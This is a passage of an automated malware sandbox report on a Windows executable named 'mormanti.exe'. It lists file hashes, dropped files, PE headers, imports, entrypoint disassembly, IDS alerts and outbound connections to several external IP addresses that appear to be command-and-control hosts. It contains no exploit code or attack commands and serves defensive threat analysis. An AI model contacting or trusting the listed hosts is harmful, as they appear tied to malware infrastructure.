                                                                                              • 31.24.158.56
                                                                                              K0or0EZubp.dllGet hashmaliciousBrowse
                                                                                              • 31.24.158.56

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4096
                                                                                              Entropy (8bit):0.5918524708219107
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:b8ek1GaD0JOCEfMuaaD0JOCEfMKQmDjjAl/gz2cE0fMbhEZolrRSQ2hyYIIT:b8NGaD0JcaaD0JwQQjjAg/0bjSQJ
                                                                                              MD5:9EB1288EAAF777CF31B19FC8052D9DDD
                                                                                              SHA1:D0366555B0FF7D5F716C215B7253373231FE1F4B
                                                                                              SHA-256:1AB4A321F9958011E0E2AA7DF522A3567EFC956F36513C512EEA3BBA3F7E2F22
                                                                                              SHA-512:E916EAE79313765EBED1A5A407594EEBAD546A7963C3E6E96FBC869B431BB491C40E973D58FC69D1D9977855B8FAC8002D1C435E855378A1508DF71343C6752E
                                                                                              Malicious:false
                                                                                              Preview: ....E..h..(.....#....yq.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................#....yq...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0656ce7e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.09325297057693027
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:agAzwl/+z6RIE11Y8TRXuo/Xx1qKIgAzwl/+z6RIE11Y8TRXuo/Xx1qK:aX0++O4blj/h1qKIX0++O4blj/h1qK
                                                                                              MD5:01DC05B086437F44DADEBE72F42AE6E4
                                                                                              SHA1:5ED9C40BDF29C734FDB24E80573BFAB46285828A
                                                                                              SHA-256:88194003F7E242AECDD75F00695B39A37441BF6C57A9812A12F9F7735BD43BA3
                                                                                              SHA-512:C1CFDEBA81E79AC3C92B208FD5E625E9625D853F518F0114FB6DF66EA1530A87F10A125A99E9E6FF3E6556568B0DC84B4C356173A2362B656E7B81698EDAB9B3
                                                                                              Malicious:false
                                                                                              Preview: .V.~... ................e.f.3...w........................&..........w..#....yq.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................t\..#....yqk................M...#....yq.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):8192
                                                                                              Entropy (8bit):0.10801090337418041
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:kE17EvGZ0i0lcSXl/bJdAtizjlD/ill:kE1iGZ0hlc8t4U1G
                                                                                              MD5:518B806DEB454B700E818B345A95C61C
                                                                                              SHA1:53C2FB38B4AB68FC2414D36920212E45895260FB
                                                                                              SHA-256:6F4DEAA5EDE225FB203717C88BAE62EB1EE0789B07C1548185C9338FE5A29C7A
                                                                                              SHA-512:D17D2469510FA2AA3F080A8EF6C8D2657E0CB6AE65D5930FD08BB94A32CB5C2E0F7844FB991FDED7885E5D209269F718A76844CEA288CBBCBAC71EFA55C18F27
                                                                                              Malicious:false
                                                                                              Preview: k........................................3...w..#....yq......w...............w.......w....:O.....w..................M...#....yq.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.11017776630826032
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:265Xm/Ey6q99954Klq3qQ10nMCldimE8eawHjcmj:26kl68wLyMCldzE9BHjc8
                                                                                              MD5:D8C933C4D3562115CDA8EC19E4C40BAB
                                                                                              SHA1:B56A16C4CCB98D25D5DFE0F211C87C28F6BAE8D5
                                                                                              SHA-256:FAE8B7380E73264FFA75864B9F212C841A62D927153EC739D80DEDB876A482BB
                                                                                              SHA-512:E75F13F453D4619F7722B799A8CAA47EF12184BFF7394309A12DEF148B5BA7DB20D6EA2A512B27B86B380BF6DE624F68B2AF8408D90F356517888C8524EAD3CA
                                                                                              Malicious:false
                                                                                              Preview: ........................................................................................t.S......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=.m.*..... .....-[...z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P..........S.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.11280925407263487
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:UrXm/Ey6q999549r1z1miM3qQ10nMCldimE8eawHza1miI5Z:/l684h1tMLyMCldzE9BHza1tIn
                                                                                              MD5:9D91B6F5D908F8FA9457289284D99D90
                                                                                              SHA1:7FA4F2CC6A51660A2767B533B9629484DD209C00
                                                                                              SHA-256:348FCA3B1B0151D5A3E0AB8F2EC51DD4404ABDB779CB3319255F5C4B7C7E77CF
                                                                                              SHA-512:110A3DEE834FB3E03DA0152E809F2CD0A50294CFF62DB8CA2C9E96F9324729840EB44DCCC46D2815F50D14ED61A67CFBE06D5F2550A8FF48DEE6A0F43087CB09
                                                                                              Malicious:false
                                                                                              Preview: .........................................................................................nQ......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=.m.*..... ........z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........<yQ.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.11273590727037369
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:U0Xm/Ey6q99954iH0z1mK2P3qQ10nMCldimE8eawHza1mKQe:Al68S1iPLyMCldzE9BHza13
                                                                                              MD5:0573B48E6E823B072B981744C4EC755A
                                                                                              SHA1:B0AC5879397474AF40AEE8E06E193A277A89D30C
                                                                                              SHA-256:CAFED707C6D08E422CC295DD756129A2BDA528D830225142ABD5F4862CEAF3DC
                                                                                              SHA-512:33F8D03E6DAC4E202ECAFE1D7491E131E8496D25FB8A0DF090EF7397B45350B9DEE82D286BA184EBD0DC319D92CC817AFFCB7CA5B3D1A42340A6156DC78C4F97
                                                                                              Malicious:false
                                                                                              Preview: ..........................................................................................P......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=.m.*..... ........z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........1P.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):55
                                                                                              Entropy (8bit):4.306461250274409
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                              Malicious:false
                                                                                              Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):906
                                                                                              Entropy (8bit):3.152601704217562
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:58KRBubdpkoF1AG3rABD2iCk9+MlWlLehB4yAq7ejCpBD2iP:OaqdmuF3rg2iV+kWReH4yJ7M42iP
                                                                                              MD5:2CA5726DE33B7191699EBFEEC4F7210C
                                                                                              SHA1:0613DF20921345EFB902DFE198764AEF58BF6C9E
                                                                                              SHA-256:00CFCED40E9C57E6C01FE432F6C4470A9330DE3DD47676C30294BB085A9EC9D5
                                                                                              SHA-512:9D63083245C34A426097B74D9EF78CE8105CAA5B4CF4586F751C02774B91A2E79873A5B71F9C9694C22325031D6F97B4C617EF223DDC16884F18488E5F5A269A
                                                                                              Malicious:false
                                                                                              Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.u.l. .. 1.6. .. 2.0.2.1. .1.7.:.0.7.:.5.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. J.u.l. .. 1.6. .. 2.0.2.1. .1.7.:.0.7.:.5.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.359134894428257
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:mormanti.exe
                                                                                              File size:102912
                                                                                              MD5:6c94edfea6e5ee001b00122c9d01bd8a
                                                                                              SHA1:a8d0cc5088ee86c2be77afe157695d12e951f369
                                                                                              SHA256:0154d1d06e755bda091168038f25c1dde101e3b77c66f88b73c71be84ffdaf6e
                                                                                              SHA512:8e4f44f2680feb8fa564a26b3f283ce360d966e01b1585686e6eb23900f5e09d39e3b62b154604972091cc928f99f835ec2e042a5c06d7df29b8c225e3db447f
                                                                                              SSDEEP:1536:jw9fHY8jOMiep0McpHa74EuSFGMpJ7q06VSE:srOMiep0ZpeuQJmpSE
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$~..J-..J-..J-:..-..J-...-..J-...-..J-...-..J-...-..J-.61-..J-..K-..J-...-..J-...-..J-...-..J-Rich..J-.......................

                                                                                              File Icon

                                                                                              Icon Hash:9a8a808292808000

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x402b60
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                              Time Stamp:0x5F325807 [Tue Aug 11 08:34:15 2020 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:c75ae73417f3d8c7926ca2cc9989d6f5

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              call 00007FA204A14198h
                                                                                              jmp 00007FA204A13A3Ch
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000328h
                                                                                              mov dword ptr [004061D8h], eax
                                                                                              mov dword ptr [004061D4h], ecx
                                                                                              mov dword ptr [004061D0h], edx
                                                                                              mov dword ptr [004061CCh], ebx
                                                                                              mov dword ptr [004061C8h], esi
                                                                                              mov dword ptr [004061C4h], edi
                                                                                              mov word ptr [004061F0h], ss
                                                                                              mov word ptr [004061E4h], cs
                                                                                              mov word ptr [004061C0h], ds
                                                                                              mov word ptr [004061BCh], es
                                                                                              mov word ptr [004061B8h], fs
                                                                                              mov word ptr [004061B4h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [004061E8h]
                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                              mov dword ptr [004061DCh], eax
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [004061E0h], eax
                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [004061ECh], eax
                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                              mov dword ptr [00406128h], 00010001h
                                                                                              mov eax, dword ptr [004061E0h]
                                                                                              mov dword ptr [004060DCh], eax
                                                                                              mov dword ptr [004060D0h], C0000409h
                                                                                              mov dword ptr [004060D4h], 00000001h
                                                                                              mov eax, dword ptr [00406018h]
                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                              mov eax, dword ptr [0040601Ch]
                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                              call dword ptr [00000068h]

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022
                                                                                              • [IMP] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [C++] VS2008 build 21022

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x48dc0x8c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x144c4.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000x454.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x42300x1c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44500x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x40000x200.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x243c0x2600False0.655324835526COM executable for DOS6.36850956542IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x40000x17020x1800False0.40625data5.1131105028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x60000x6480x200False0.232421875data2.09168969639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x70000x144c40x14600False0.486459930982data6.30306243713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x1c0000x70c0x800False0.49853515625data4.44276595657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_ICON0x75500x2e8dataEnglishUnited States
                                                                                              RT_ICON0x78380x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0x79600xea8dataEnglishUnited States
                                                                                              RT_ICON0x88080x8a8dataEnglishUnited States
                                                                                              RT_ICON0x90b00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0x96180x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                              RT_ICON0xbbc00x10a8dataEnglishUnited States
                                                                                              RT_ICON0xcc680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0xd0d00x2e8dataEnglishUnited States
                                                                                              RT_ICON0xd3b80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0xd4e00xea8dataEnglishUnited States
                                                                                              RT_ICON0xe3880x8a8dataEnglishUnited States
                                                                                              RT_ICON0xec300x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0xf1980x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                              RT_ICON0x117400x10a8dataEnglishUnited States
                                                                                              RT_ICON0x127e80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_MENU0x12c500x4adataEnglishUnited States
                                                                                              RT_DIALOG0x12c9c0x140dataEnglishUnited States
                                                                                              RT_STRING0x12ddc0x4cdataEnglishUnited States
                                                                                              RT_ACCELERATOR0x12e280x10dataEnglishUnited States
                                                                                              RT_RCDATA0x12e380x8344dataEnglishUnited States
                                                                                              RT_GROUP_ICON0x1b17c0x76dataEnglishUnited States
                                                                                              RT_GROUP_ICON0x1b1f40x76dataEnglishUnited States
                                                                                              RT_MANIFEST0x1b26c0x256ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllSleep, InterlockedCompareExchange, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, LoadLibraryExA, GetTickCount64, InterlockedExchange
                                                                                              USER32.dllLoadIconW, LoadCursorW, RegisterClassExW, CreateWindowExW, ShowWindow, UpdateWindow, SetTimer, PostQuitMessage, DialogBoxParamW, DestroyWindow, DefWindowProcW, SetCapture, PtInRect, ReleaseCapture, BeginPaint, DispatchMessageW, TranslateMessage, TranslateAcceleratorW, GetMessageW, LoadAcceleratorsW, LoadStringW, OffsetRect, DrawTextA, FillRect, InvalidateRect, ReleaseDC, GetDC, GetClientRect, EndPaint, EndDialog
                                                                                              GDI32.dllCreateSolidBrush, DeleteObject, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, GetStockObject, SaveDC, RestoreDC, SetBkMode, BitBlt, CreateRectRgnIndirect, CreatePolygonRgn, CombineRgn, SelectClipRgn, Ellipse, Rectangle, CreatePen
                                                                                              MSVCP90.dll??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ, ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z, ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?uncaught_exception@std@@YA_NXZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ, ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z
                                                                                              MSIMG32.dllAlphaBlend, GradientFill
                                                                                              MSVCR90.dll_amsg_exit, _CxxThrowException, __CxxFrameHandler3, _controlfp_s, _invoke_watson, _except_handler4_common, ?_type_info_dtor_internal_method@type_info@@QAEXXZ, ?terminate@@YAXXZ, _crt_debugger_hook, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, ??1exception@std@@UAE@XZ, ??3@YAXPAX@Z, ??0exception@std@@QAE@XZ, ??0exception@std@@QAE@ABV01@@Z, ??2@YAPAXI@Z, _invalid_parameter_noinfo, srand, rand, _time64, _wcslwr, atoi, _unlock, __dllonexit, _encode_pointer, _lock, _onexit, _decode_pointer, memcpy, __wgetmainargs, _cexit, _exit, _XcptFilter, exit, _wcmdln

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              07/16/21-17:07:12.259592ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited104.131.103.37192.168.2.3
                                                                                              07/16/21-17:07:15.256691ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited104.131.103.37192.168.2.3
                                                                                              07/16/21-17:07:21.273124ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited104.131.103.37192.168.2.3
                                                                                              07/16/21-17:07:42.618824ICMP399ICMP Destination Unreachable Host Unreachable72.10.63.118192.168.2.3
                                                                                              07/16/21-17:07:45.806111ICMP399ICMP Destination Unreachable Host Unreachable72.10.63.118192.168.2.3
                                                                                              07/16/21-17:07:51.997887ICMP399ICMP Destination Unreachable Host Unreachable72.10.63.118192.168.2.3

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jul 16, 2021 17:06:20.542170048 CEST4971880192.168.2.358.171.153.81
                                                                                              Jul 16, 2021 17:06:23.548013926 CEST4971880192.168.2.358.171.153.81
                                                                                              Jul 16, 2021 17:06:29.548536062 CEST4971880192.168.2.358.171.153.81
                                                                                              Jul 16, 2021 17:06:44.281224966 CEST49727443192.168.2.3104.131.103.128
                                                                                              Jul 16, 2021 17:06:44.403786898 CEST44349727104.131.103.128192.168.2.3
                                                                                              Jul 16, 2021 17:06:44.908982992 CEST49727443192.168.2.3104.131.103.128
                                                                                              Jul 16, 2021 17:06:45.031189919 CEST44349727104.131.103.128192.168.2.3
                                                                                              Jul 16, 2021 17:06:45.534087896 CEST49727443192.168.2.3104.131.103.128
                                                                                              Jul 16, 2021 17:06:45.657490969 CEST44349727104.131.103.128192.168.2.3
                                                                                              Jul 16, 2021 17:06:48.471726894 CEST497288080192.168.2.366.228.49.173
                                                                                              Jul 16, 2021 17:06:51.472075939 CEST497288080192.168.2.366.228.49.173
                                                                                              Jul 16, 2021 17:06:57.472614050 CEST497288080192.168.2.366.228.49.173
                                                                                              Jul 16, 2021 17:07:12.132922888 CEST497348080192.168.2.3104.131.103.37
                                                                                              Jul 16, 2021 17:07:15.130383968 CEST497348080192.168.2.3104.131.103.37
                                                                                              Jul 16, 2021 17:07:21.146560907 CEST497348080192.168.2.3104.131.103.37
                                                                                              Jul 16, 2021 17:07:35.370628119 CEST497408080192.168.2.3149.62.173.247
                                                                                              Jul 16, 2021 17:07:35.438725948 CEST808049740149.62.173.247192.168.2.3
                                                                                              Jul 16, 2021 17:07:35.944820881 CEST497408080192.168.2.3149.62.173.247
                                                                                              Jul 16, 2021 17:07:36.012451887 CEST808049740149.62.173.247192.168.2.3
                                                                                              Jul 16, 2021 17:07:36.523617983 CEST497408080192.168.2.3149.62.173.247
                                                                                              Jul 16, 2021 17:07:36.594460011 CEST808049740149.62.173.247192.168.2.3
                                                                                              Jul 16, 2021 17:07:40.373577118 CEST497417080192.168.2.372.47.248.48
                                                                                              Jul 16, 2021 17:07:43.382858038 CEST497417080192.168.2.372.47.248.48
                                                                                              Jul 16, 2021 17:07:49.398936987 CEST497417080192.168.2.372.47.248.48
                                                                                              Jul 16, 2021 17:08:04.116400003 CEST497448080192.168.2.368.183.170.114
                                                                                              Jul 16, 2021 17:08:07.103610039 CEST497448080192.168.2.368.183.170.114
                                                                                              Jul 16, 2021 17:08:13.103981018 CEST497448080192.168.2.368.183.170.114

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jul 16, 2021 17:06:02.333093882 CEST5020053192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:02.398982048 CEST53502008.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:02.403018951 CEST5128153192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:02.455171108 CEST53512818.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:03.199887991 CEST4919953192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:03.251107931 CEST53491998.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:04.301538944 CEST5062053192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:04.360388994 CEST53506208.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:05.009922981 CEST6493853192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:05.080878973 CEST53649388.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:05.522526026 CEST6015253192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:05.575153112 CEST53601528.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:06.713778019 CEST5754453192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:06.763395071 CEST53575448.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:07.789093018 CEST5598453192.168.2.38.8.8.8
